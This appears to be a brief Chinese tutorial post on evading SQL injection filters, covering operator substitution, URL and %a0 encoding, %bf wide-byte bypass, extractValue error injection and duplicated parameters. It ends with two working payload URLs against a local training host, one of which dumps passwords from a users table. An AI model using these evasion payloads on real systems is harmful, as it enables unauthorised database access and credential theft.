Sql Inject 拦截器过滤
拦截器过滤在 SQL 注入中是很常用的一个功能。
1、and 使用 && 代替
所代表的意义是一样的
2、or 使用 || 代替
所代表的意义是一样的
3、urlcode 转码
例如[']转成%27,普遍用在代码检测不彻底的情况下。
4、SQL技巧
绕过空格,使用select(1),(2),(3)类似的形式
5、相关函数
5.1 extractValue
报错注入的另一种形式,与双查询类似。
5.2 %a0编码
对于空格的限制,采用编码。
5.3 %bf编码
宽字节绕过。
6、双重参数
双重参数是指,同时提交两个参数名一样的参数,服务端仅验证了第一个。底层代码却处理了2个参数,达到绕过程序检测的目的。
例如
payload:http://192.168.230.129/trainer/Less-27/?id=911%27UnION%a0SElect(3),(SELect%a0group_concat(password)from%a0users),(5)and%a0%271
payload:http://192.168.230.129/trainer/Less-32/index.php?id=%bf%27%20union%20select%201,version(),user()%20--+
评论
发表评论